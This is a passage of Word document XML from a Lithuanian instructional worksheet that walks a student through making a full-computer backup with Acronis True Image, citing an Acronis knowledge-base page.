      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti ekrano vaizdus arba aprašyti</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip naudojantis</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Acronis True Image įrankiu</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sukuriamos duomenų kopijos</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224D715" w14:textId="2BAD9BB3" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F47BC1" w14:textId="09CB9A8B" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Darbo eiga </w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F393C5F" w14:textId="5770BBA1" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paleiskite „Acronis True Image“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741F04F" w14:textId="30F70F71" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="620FC6AD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Šoninėje juostoje spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Atsarginė kopija</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00510527" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD4ABE" w14:textId="1118396C" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Jei sąraše jau yra kitų atsarginių kopijų (pvz., </w:t>
      </w:r>
      <w:r w:rsidR="00D33249" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ukurtos naudojant ankstesnes „Acronis True Image“ versijas), tada spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pridėti atsarginę kopiją</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘‘</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600803C3" w14:textId="4A4651F2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Iš anksto pasirinktas visas kompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="56886FFA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o diskas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, palikite</w:t>
      </w:r>
      <w:r w:rsidR="56ADF5C9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> taip, kaip </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="2EA485EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nustatyta</w:t>
      </w:r>
      <w:r w:rsidR="21C937FC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63655482" w14:textId="3592AB17" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Galite nurodyti pasirinktinį atsarginės kopijos pavadinimą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E4AA26" w14:textId="4A90ED78" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pasirinkti paskirties vietą</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘‘</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">asirinkite atsarginės kopijos </w:t>
      </w:r>
      <w:r w:rsidR="518E51C8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vietą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A894AE" w14:textId="4DCF188A" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jums reikia „Acronis True Image Advanced“ ir „Premium“ prenumeratos, kad galėtumėte kurti atsargines kopijas „Acronis Cloud“. Jei prijungtas išorinis diskas, jis bus aptiktas automatiškai ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">rodomas galimų atsarginių kopijų paskirties vietų sąraše. „Acronis True Image“ taip pat aptinka </w:t>
      </w:r>
      <w:r w:rsidR="056C7415" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>serverį (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NAS</w:t>
      </w:r>
      <w:r w:rsidR="5C6F177D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkle ir pateiki</w:t>
      </w:r>
      <w:r w:rsidR="79F9844D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a jį kaip vieną iš galimų variantų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DE9F9" w14:textId="57D02C5A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="620FC6AD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Šiame</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="124CAFDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paveikslėlyje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="42C46D94" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vaizduota</w:t>
      </w:r>
      <w:r w:rsidR="00330F1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip</w:t>
      </w:r>
      <w:r w:rsidR="6F0AC6A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> panaudo</w:t>
      </w:r>
      <w:r w:rsidR="558E165B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Acronis Cloud“</w:t>
      </w:r>
      <w:r w:rsidR="339AA5FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> katalogą </w:t>
      </w:r>
      <w:r w:rsidR="3D3A3DB9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>duomenų kopijos išsaugojimui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736352B8" w14:textId="574FD63C" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="540F2866" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E3515D" wp14:editId="60A47428">
            <wp:extent cx="3257550" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="992318808" name="Picture 99231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318808"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId237">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3257550" cy="2200275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AE77E" w14:textId="5CC6A6A0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00BF7B83" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="1DB77C64" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Acronis True Image įrankis skirtas duomenų kopijoms kurti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1D53A" w14:textId="098148FC" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Acronis True Image 2021: how to back up entire computer</w:t>
      </w:r>
      <w:r w:rsidR="210B2F45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="44566D21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, gruodžio 11). </w:t>
      </w:r>
      <w:r w:rsidR="5FF23674" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis </w:t>
      </w:r>
      <w:r w:rsidR="1C77818F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kno</w:t>
      </w:r>
      <w:r w:rsidR="43A5A85B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="1C77818F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>le</w:t>
      </w:r>
      <w:r w:rsidR="43A5A85B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="1C77818F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ge Base. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId238">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/65468</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BF51E72" w14:textId="098148FC" w:rsidR="007C1E8E" w:rsidRPr="005A5C28" w:rsidRDefault="007C1E8E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7B0975" w14:textId="7C685C0F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1DB77C64" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="000173C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Parinktys”, kad nustatytumėte atsarginės kopijos</w:t>
      </w:r>
      <w:r w:rsidR="48337561" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tvarkaraštį, schemą, archyvo valymą ir kt</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4AC9C0" w14:textId="08030CE4" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00330F1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
